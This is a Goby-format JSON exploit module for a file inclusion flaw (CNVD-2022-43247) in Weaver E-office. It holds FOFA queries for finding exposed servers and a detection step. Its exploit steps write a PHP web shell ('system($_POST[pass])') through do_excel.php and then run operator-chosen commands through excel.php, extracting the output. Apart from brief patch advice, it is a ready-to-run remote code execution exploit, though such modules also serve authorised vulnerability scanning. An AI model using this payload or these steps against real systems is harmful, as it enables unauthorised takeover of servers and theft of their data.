{
|
||
"Name": "Weaver E-office do_excel.php file inclusion vulnerability",
|
||
"Description": "<p>e-office is a standard collaborative mobile office platform.</p><p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.</p>",
|
||
"Product": "Weaver E-office",
|
||
"Homepage": "www.weaver.com.cn",
|
||
"DisclosureDate": "2022-03-23",
|
||
"Author": "1243099890@qq.com",
|
||
"FofaQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
|
||
"GobyQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
|
||
"Level": "3",
|
||
"Impact": "<p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.<br></p>",
|
||
"References": [],
|
||
"Is0day": false,
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "cmd",
|
||
"type": "input",
|
||
"value": "whoami",
|
||
"show": ""
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/general/charge/charge_list/do_excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "html=<?php echo md5(233);unlink(__FILE__);?>"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/general/charge/charge_list/excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "e165421110ba03099a1c0393373c5b43",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/general/charge/charge_list/do_excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "html=<?php system($_POST[pass]);?>"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/general/charge/charge_list/excel.php",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Length": "52",
|
||
"Cache-Control": "max-age=0",
|
||
"Upgrade-Insecure-Requests": "1",
|
||
"Content-Type": "application/x-www-form-urlencoded",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "pass={{{cmd}}}"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|<div id=\"Classeur1_16681\" align=center x:publishsource=\"Excel\">(?s)(.*)</div>"
|
||
]
|
||
}
|
||
],
|
||
"Tags": [
|
||
"Remote File Inclusion"
|
||
],
|
||
"VulType": [
|
||
"Remote File Inclusion"
|
||
],
|
||
"CVEIDs": [
|
||
""
|
||
],
|
||
"CNNVD": [
|
||
""
|
||
],
|
||
"CNVD": [
|
||
"CNVD-2022-43247"
|
||
],
|
||
"CVSSScore": "10.0",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "泛微 E-Office 文件包含漏洞(CNVD-2022-43247)",
|
||
"Product": "泛微 E-office",
|
||
"Description": "<p>e-office是上海泛微网络科技股份有限公司一款标准协同移动办公平台。</p><p>e-office存在文件包含漏洞,攻击者可以通过该漏洞写入恶意文件。</p>",
|
||
"Recommendation": "<p>厂商已发布补丁修复漏洞,请及时更新:<span style=\"color: var(--primaryFont-color);\"><a href=\"https://www.weaver.com.cn/\">https://www.weaver.com.cn/</a></span></p>",
|
||
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">e-office存在文件包含漏洞,攻击者可以通过该漏洞写入恶意文件。</span><br></p>",
|
||
"VulType": [
|
||
"远程文件包含"
|
||
],
|
||
"Tags": [
|
||
"远程文件包含"
|
||
]
|
||
},
|
||
"EN": {
|
||
"Name": "Weaver E-office do_excel.php file inclusion vulnerability",
|
||
"Product": "Weaver E-office",
|
||
"Description": "<p>e-office is a standard collaborative mobile office platform.</p><p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.</p>",
|
||
"Recommendation": "<p>The vendor has released a patch that fixes the vulnerability; please apply the update promptly: <a href=\"https://www.weaver.com.cn/\" target=\"_blank\">https://www.weaver.com.cn/</a><br></p>",
|
||
"Impact": "<p>There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.<br></p>",
|
||
"VulType": [
|
||
"Remote File Inclusion"
|
||
],
|
||
"Tags": [
|
||
"Remote File Inclusion"
|
||
]
|
||
}
|
||
},
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |